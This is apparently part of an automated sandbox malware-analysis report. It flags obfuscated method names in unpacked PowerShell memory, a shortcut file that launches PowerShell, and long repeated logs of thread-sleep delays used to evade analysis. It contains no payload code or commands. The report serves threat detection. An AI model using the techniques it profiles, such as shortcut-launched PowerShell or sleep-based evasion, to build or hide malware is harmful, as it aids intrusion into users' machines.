Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	High entropy of concatenated method names: 'W3TTnrdHYQAU0gCbLOv', 'LPI9xTd5L7heHm3qxXh', 'TTuT2DZnCl', 'RPSJ1Ed6fahDA5qnaSR', 'QdgRNOdGGLKlRSbu3ra', 'XoE78OdPjrctZT1Qmnf', 'AMSk2Ud0KIx05jVaKB9', 'NCUaXbdJSIL38FYfoMw', 'm8uCGCd9IXH8I9sTXyq', 'X7ERAYdgylU7CTAoiBa'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, muKlemtUJb9FDY9MpyK.cs	High entropy of concatenated method names: 'lbXtGHdsP8', 'RELuWwFjFAUW44IVKPc', 'fIc2WkFaPR7imTP8JmC', 'EYKNLdFfBX4c5SoU1iG', 'OH5spZF23SSXjspaeyr', 'qIh2nMFrn1GsscK1oic'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, oy9Q57ixYXL6eDBsPUs.cs	High entropy of concatenated method names: 'Aq6icvUVg0', 'dM5hXN1UDubTghNyY5A', 'iuuHGH163oWQpyvjCwy', 'ECOrgU1GYiB8BtUE5f2', 'si7r121I4QAAkfZJHcZ', 'zlPg4K1RHLa7yCUNaUJ'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, wAsBrhumJTLpHXMnaSZ.cs	High entropy of concatenated method names: 'ajWQf8Vyhf', 'W1XQlDmTnA', 'x7LQBturIK', 'eUHQXbHGjC', 'SYvQE7seDc', 'WnvQFVOasF', 'cTlQ1WZJix', 'AGJusBkkSj', 'Tr2QDbehep', 'KaBQd33BGk'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, ucPbfPJwI9dD5uyIC9.cs	High entropy of concatenated method names: 'EQLg8sV2b', 'jEQvCKfo9WVKkh0eJDZ', 'dqSTL3fkwGwhtI4K76s', 'eqA6yefnQqqSpxrr6kg', 'vLsXXaf7oORFvJbPtdT', 'eOM5PRf9eUgjUHAR5Vk', 'PEoPv6fgUt9uhLhvpKm'

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5537	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4274	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6111	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3486	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6108	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep count: 6111 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep count: 3486 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

